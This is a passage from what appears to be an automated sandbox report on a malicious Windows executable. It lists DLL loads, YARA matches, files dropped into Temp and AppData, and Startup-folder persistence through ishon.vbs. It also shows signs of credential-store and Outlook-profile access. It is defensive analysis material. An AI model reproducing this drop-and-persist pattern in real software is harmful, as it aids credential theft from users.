                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: wtsapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: winsta.dll
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\Ref#2056119.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Ref#2056119.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Ref#2056119.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: \??\C:\Windows\dll\System.pdbsR source: Liphmahu.exe, 00000008.00000002.3111190217.00000000010F8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: Liphmahu.exe, 00000008.00000002.3111190217.0000000001148000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000004082000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2058549679.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003855000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004360000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000004082000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2058549679.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003855000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004360000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdb@RqN source: Liphmahu.exe, 00000008.00000002.3111190217.00000000010F8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Liphmahu.PDB source: Liphmahu.exe, 00000008.00000002.3110023238.0000000000D37000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdb source: Liphmahu.exe, 00000008.00000002.3111190217.0000000001148000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: HP*n,C:\Windows\System.pdb source: Liphmahu.exe, 00000008.00000002.3110023238.0000000000D37000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbM source: Liphmahu.exe, 00000008.00000002.3111190217.0000000001148000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: Liphmahu.exe, 00000008.00000002.3111190217.00000000010E2000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ##.pdb source: Liphmahu.exe, 00000008.00000002.3110023238.0000000000D37000.00000004.00000010.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.Ref#2056119.exe.416b108.2.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#2056119.exe.416b108.2.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#2056119.exe.416b108.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#2056119.exe.416b108.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#2056119.exe.416b108.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#2056119.exe.7280000.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#2056119.exe.7280000.8.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#2056119.exe.7280000.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#2056119.exe.7280000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#2056119.exe.7280000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: Yara matchFile source: 4.2.Liphmahu.exe.6890000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Liphmahu.exe.3630ad0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#2056119.exe.71f0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2031085237.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2215628448.0000000006890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2055273808.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#2056119.exe PID: 7496, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Liphmahu.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 7236, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0133DA98 pushad ; ret 0_2_0133DA99
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_070F1913 push eax; ret 0_2_070F191D
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_070F1C88 push eax; retf 0_2_070F1E11
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_070F1C83 push eax; retf 0_2_070F1E11
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0714E65A push eax; retf 0_2_0714E661
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0714E9DC push esp; iretd 0_2_0714E9F1
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071584DF push edi; iretd 0_2_071584FF
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_07153A12 push BA051AC2h; retf 0_2_07153A17
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0717C929 push BA051AC2h; ret 0_2_0717C92E
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071781B9 pushad ; iretd 0_2_071781C5
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0743552D push FFFFFF8Bh; iretd 0_2_0743552F
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_07435405 push FFFFFF8Bh; iretd 0_2_07435407
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_074353EC push FFFFFF8Bh; ret 0_2_074353F0
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_074353B1 push FFFFFF8Bh; ret 0_2_074353B6
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_07434AFA push 8BF08B6Ah; retf 0_2_07434AFF
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0743E1E3 push 8BD08B6Bh; retf 0_2_0743E1E8
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_074B53A0 push eax; ret 0_2_074B53A1
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_0091E998 pushad ; retf 4_2_0091E9B6
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_0091DA98 pushad ; ret 4_2_0091DA99
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D25191 pushad ; ret 4_2_05D251F1
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D25198 pushad ; ret 4_2_05D251F1
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D21913 push eax; ret 4_2_05D2191D
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D4EDBA pushfd ; iretd 4_2_05D4EDC1
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D83DDD push BA04A3C2h; retf 4_2_05D83DE2
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8F571 push BA04A3C2h; retn 0001h4_2_05D8F576
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D884BA push 3005D7CBh; iretd 4_2_05D884C5
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D87690 pushfd ; ret 4_2_05D87691
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D83EA3 push BA04A3C2h; retf 4_2_05D83EA8
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8F679 push BA04A3C2h; retn 0001h4_2_05D8F67E
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D83BB6 push BA04A3C2h; ret 4_2_05D83BBB
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_067C45B3 push ss; iretd 4_2_067C45B9
                      Source: C:\Users\user\Desktop\Ref#2056119.exeFile created: C:\Users\user\AppData\Roaming\ishon.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Ref#2056119.exeFile created: C:\Users\user\AppData\Local\Temp\Liphmahu.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\Ref#2056119.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\Ref#2056119.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbsJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
